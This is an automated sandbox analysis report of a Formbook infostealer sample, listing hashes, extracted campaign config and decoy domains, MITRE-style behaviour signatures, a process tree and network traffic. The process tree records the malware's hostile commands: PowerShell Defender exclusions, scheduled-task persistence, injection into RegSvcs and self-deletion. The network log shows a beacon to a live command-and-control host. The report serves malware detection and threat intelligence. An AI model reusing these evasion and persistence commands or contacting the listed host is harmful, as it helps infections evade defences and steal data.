Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

Revised documents.exe

windows7-x64

10

Revised documents.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    145s
  • max time network
    137s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/01/2025, 03:58 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Revised documents.exe

  • Size

    741KB

  • MD5

    034884d1de2c2e61a49d403a6673118c

  • SHA1

    4106f0fe2e8504f0f71cc012ecb992b63cb0792b

  • SHA256

    6f706398207b1fd3a00de5f859dc840cf8e100175fdabe260ebb96db5980f03c

  • SHA512

    3a751cde89e771defecd23a1fda44c219df59bca611daebd8be29985071e0e5d5f15f983306afc9b468c92e2bbb96c4b6438ae23fbe896927cf47c29c72037b7

  • SSDEEP

    12288:2q7kGLFFgETr/iTTbB6xddbQT+wwOXgMSQejYO6YmDDI01jnIltQLZEK:l3rKGHbQlSQ/GmDt1jnRj

Score
10/10
formbooka03ddiscoveryexecutionratspywarestealertrojan

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

a03d

Decoy

nfluencer-marketing-13524.bond

cebepu.info

lphatechblog.xyz

haoyun.website

itiz.xyz

orld-visa-center.online

si.art

alata.xyz

mmarketing.xyz

elnqdjc.shop

ensentoto.cloud

voyagu.info

onvert.today

1fuli9902.shop

otelhafnia.info

rumpchiefofstaff.store

urvivalflashlights.shop

0090.pizza

ings-hu-13.today

oliticalpatriot.net

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Formbook family
    formbook
  • Formbook payload 3 IoCs
    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3436
    • C:\Users\Admin\AppData\Local\Temp\Revised documents.exe
      "C:\Users\Admin\AppData\Local\Temp\Revised documents.exe"
      2⤵
      • Checks computer location settings
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1804
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Revised documents.exe"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4804
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\fmIowyKo.exe"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2596
      • C:\Windows\SysWOW64\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fmIowyKo" /XML "C:\Users\Admin\AppData\Local\Temp\tmpA623.tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1944
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
          PID:2392
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          3⤵
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1996
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\SysWOW64\cmd.exe"
            4⤵
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4528
            • C:\Windows\SysWOW64\cmd.exe
              /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2996

    Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dnsgoogle
    • flag-us
      DNS
      232.168.11.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      232.168.11.51.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      11.153.16.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      11.153.16.2.in-addr.arpa
      IN PTR
      Response
      11.153.16.2.in-addr.arpa
      IN PTR
      a2-16-153-11deploystaticakamaitechnologiescom
    • flag-us
      DNS
      138.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      138.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      167.173.78.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      167.173.78.104.in-addr.arpa
      IN PTR
      Response
      167.173.78.104.in-addr.arpa
      IN PTR
      a104-78-173-167deploystaticakamaitechnologiescom
    • flag-us
      DNS
      28.118.140.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      28.118.140.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      50.23.12.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.23.12.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      15.164.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.164.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      86.49.80.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.49.80.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      www.argloscaremedia.info
      Remote address:
      8.8.8.8:53
      Request
      www.argloscaremedia.info
      IN A
      Response
    • flag-us
      DNS
      8.153.16.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.153.16.2.in-addr.arpa
      IN PTR
      Response
      8.153.16.2.in-addr.arpa
      IN PTR
      a2-16-153-8deploystaticakamaitechnologiescom
    • flag-us
      DNS
      www.urvivalflashlights.shop
      Remote address:
      8.8.8.8:53
      Request
      www.urvivalflashlights.shop
      IN A
      Response
    • flag-us
      DNS
      www.urvivalflashlights.shop
      Remote address:
      8.8.8.8:53
      Request
      www.urvivalflashlights.shop
      IN A
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      14.227.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      14.227.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      www.72266.vip
      Remote address:
      8.8.8.8:53
      Request
      www.72266.vip
      IN A
      Response
      www.72266.vip
      IN CNAME
      myn5k92z.zx770.com
      myn5k92z.zx770.com
      IN CNAME
      ksu4btcv.n.zx770.com
      ksu4btcv.n.zx770.com
      IN A
      66.203.146.90
      ksu4btcv.n.zx770.com
      IN A
      66.203.147.115
    • flag-hk
      GET
      http://www.72266.vip/a03d/?mH=x4kXZd_p&CTJP=PvofVsV8vZdHD23UxdMPdan6pp/8P6lu4oFJmgBG0kPNUmMGSGwi+F/K7OLyN1+CSuAL
      Explorer.EXE
      Remote address:
      66.203.146.90:80
      Request
      GET /a03d/?mH=x4kXZd_p&CTJP=PvofVsV8vZdHD23UxdMPdan6pp/8P6lu4oFJmgBG0kPNUmMGSGwi+F/K7OLyN1+CSuAL HTTP/1.1
      Host: www.72266.vip
      Connection: close
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Thu, 30 Jan 2025 03:59:57 GMT
      Content-Type: text/html
      Content-Length: 166
      Connection: close
      Location: https://www.72266.vip/a03d/?mH=x4kXZd_p&CTJP=PvofVsV8vZdHD23UxdMPdan6pp/8P6lu4oFJmgBG0kPNUmMGSGwi+F/K7OLyN1+CSuAL
      Server: cdn
      X-Cache-Status: MISS
    • flag-us
      DNS
      90.146.203.66.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      90.146.203.66.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      www.lphatechblog.xyz
      Remote address:
      8.8.8.8:53
      Request
      www.lphatechblog.xyz
      IN A
      Response
    • 66.203.146.90:80
      http://www.72266.vip/a03d/?mH=x4kXZd_p&CTJP=PvofVsV8vZdHD23UxdMPdan6pp/8P6lu4oFJmgBG0kPNUmMGSGwi+F/K7OLyN1+CSuAL
      http
      Explorer.EXE
      386 B
       674 B
       5
      5

      HTTP Request

      GET http://www.72266.vip/a03d/?mH=x4kXZd_p&CTJP=PvofVsV8vZdHD23UxdMPdan6pp/8P6lu4oFJmgBG0kPNUmMGSGwi+F/K7OLyN1+CSuAL

      HTTP Response

      301
    • 8.8.8.8:53
      8.8.8.8.in-addr.arpa
      dns
      66 B
       90 B
       1
      1

      DNS Request

      8.8.8.8.in-addr.arpa

    • 8.8.8.8:53
      232.168.11.51.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      232.168.11.51.in-addr.arpa

    • 8.8.8.8:53
      11.153.16.2.in-addr.arpa
      dns
      70 B
       133 B
       1
      1

      DNS Request

      11.153.16.2.in-addr.arpa

    • 8.8.8.8:53
      138.32.126.40.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      138.32.126.40.in-addr.arpa

    • 8.8.8.8:53
      167.173.78.104.in-addr.arpa
      dns
      73 B
       139 B
       1
      1

      DNS Request

      167.173.78.104.in-addr.arpa

    • 8.8.8.8:53
      28.118.140.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      28.118.140.52.in-addr.arpa

    • 8.8.8.8:53
      50.23.12.20.in-addr.arpa
      dns
      70 B
       156 B
       1
      1

      DNS Request

      50.23.12.20.in-addr.arpa

    • 8.8.8.8:53
      15.164.165.52.in-addr.arpa
      dns
      72 B
       146 B
       1
      1

      DNS Request

      15.164.165.52.in-addr.arpa

    • 8.8.8.8:53
      86.49.80.91.in-addr.arpa
      dns
      70 B
       145 B
       1
      1

      DNS Request

      86.49.80.91.in-addr.arpa

    • 8.8.8.8:53
      www.argloscaremedia.info
      dns
      70 B
       149 B
       1
      1

      DNS Request

      www.argloscaremedia.info

    • 8.8.8.8:53
      8.153.16.2.in-addr.arpa
      dns
      69 B
       131 B
       1
      1

      DNS Request

      8.153.16.2.in-addr.arpa

    • 8.8.8.8:53
      www.urvivalflashlights.shop
      dns
      146 B
       260 B
       2
      2

      DNS Request

      www.urvivalflashlights.shop

      DNS Request

      www.urvivalflashlights.shop

    • 8.8.8.8:53
      14.227.111.52.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      14.227.111.52.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
       128 B
       1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    • 8.8.8.8:53
      www.72266.vip
      dns
      59 B
       148 B
       1
      1

      DNS Request

      www.72266.vip

      DNS Response

      66.203.146.90
      66.203.147.115

    • 8.8.8.8:53
      90.146.203.66.in-addr.arpa
      dns
      72 B
       126 B
       1
      1

      DNS Request

      90.146.203.66.in-addr.arpa

    • 8.8.8.8:53
      www.lphatechblog.xyz
      dns
      66 B
       131 B
       1
      1

      DNS Request

      www.lphatechblog.xyz

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
      Filesize

      2KB

      MD5

      3d086a433708053f9bf9523e1d87a4e8

      SHA1

      b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

      SHA256

      6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

      SHA512

      931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      18KB

      MD5

      69530750ca658740fe137558e6d11795

      SHA1

      fee54b2c5d165bb7ea50895998c462942f277b63

      SHA256

      0b2cb9283468e95aef0ac53d0991f0ec52fdaa7168f0a79715718f10ead83626

      SHA512

      bc612b79acbd801fed719b4b3e8009bf09ae4c9ccdfe04355a5943b8f149078dc38823fe7dd6bb3c29abd8344ef7f9a800d95d29055810287d323f4ba5c61676

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yyh5enpb.lc4.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\tmpA623.tmp
      Filesize

      1KB

      MD5

      9be0c83b03c6d16d70cc126cc1381c88

      SHA1

      b50c6ee1d1de9719bda45f96979f8554f7ee9b99

      SHA256

      8de0dd09406f751ba0cf0d8602083409e50742c40daf6c7aca678bbe66176876

      SHA512

      91185abf9d11c15b5d4b7591b9f377105ba956b34c632f4d1a1ebec2f953c74212cd37ef7a01535b0bfa5eb2f338860244ce3685042c0a16ba4d82e606ecf8cf

      Download Submit

    • memory/1804-49-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1804-4-0x0000000005AB0000-0x0000000005E04000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1804-6-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1804-7-0x0000000007700000-0x00000000077B2000-memory.dmp

      Filesize

      712KB

      Download

    • memory/1804-8-0x0000000007800000-0x000000000781E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/1804-9-0x00000000750CE000-0x00000000750CF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1804-10-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1804-11-0x00000000053F0000-0x0000000005468000-memory.dmp

      Filesize

      480KB

      Download

    • memory/1804-12-0x000000000E610000-0x000000000E6AC000-memory.dmp

      Filesize

      624KB

      Download

    • memory/1804-0-0x00000000750CE000-0x00000000750CF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1804-1-0x0000000000F70000-0x000000000102E000-memory.dmp

      Filesize

      760KB

      Download

    • memory/1804-2-0x0000000005FC0000-0x0000000006564000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1804-3-0x0000000005A10000-0x0000000005AA2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/1804-5-0x0000000005F30000-0x0000000005F3A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/1996-47-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

      Download

    • memory/1996-92-0x0000000000400000-0x000000000042F000-memory.dmp

      Filesize

      188KB

      Download

    • memory/2596-37-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2596-54-0x0000000075970000-0x00000000759BC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/2596-22-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2596-90-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2596-77-0x0000000006DB0000-0x0000000006DCA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2596-76-0x00000000073F0000-0x0000000007A6A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/2596-24-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2596-80-0x0000000006FB0000-0x0000000006FC1000-memory.dmp

      Filesize

      68KB

      Download

    • memory/2596-75-0x0000000006C70000-0x0000000006D13000-memory.dmp

      Filesize

      652KB

      Download

    • memory/2596-83-0x00000000070F0000-0x000000000710A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/2596-53-0x0000000006C00000-0x0000000006C32000-memory.dmp

      Filesize

      200KB

      Download

    • memory/2596-82-0x0000000006FF0000-0x0000000007004000-memory.dmp

      Filesize

      80KB

      Download

    • memory/2596-74-0x0000000006C40000-0x0000000006C5E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3436-98-0x0000000008B40000-0x0000000008C61000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/4528-93-0x0000000000D70000-0x0000000000DCA000-memory.dmp

      Filesize

      360KB

      Download

    • memory/4528-95-0x0000000000930000-0x000000000095F000-memory.dmp

      Filesize

      188KB

      Download

    • memory/4528-94-0x0000000000D70000-0x0000000000DCA000-memory.dmp

      Filesize

      360KB

      Download

    • memory/4804-17-0x0000000004810000-0x0000000004846000-memory.dmp

      Filesize

      216KB

      Download

    • memory/4804-79-0x0000000007370000-0x0000000007406000-memory.dmp

      Filesize

      600KB

      Download

    • memory/4804-78-0x0000000007160000-0x000000000716A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/4804-81-0x0000000007320000-0x000000000732E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/4804-55-0x0000000075970000-0x00000000759BC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4804-52-0x0000000005E70000-0x0000000005EBC000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4804-84-0x0000000007410000-0x0000000007418000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4804-51-0x0000000005DC0000-0x0000000005DDE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4804-30-0x00000000056D0000-0x0000000005736000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4804-91-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4804-31-0x00000000057B0000-0x0000000005816000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4804-23-0x0000000005620000-0x0000000005642000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4804-21-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4804-19-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4804-20-0x0000000004F00000-0x0000000005528000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/4804-18-0x00000000750C0000-0x0000000075870000-memory.dmp

      Filesize

      7.7MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.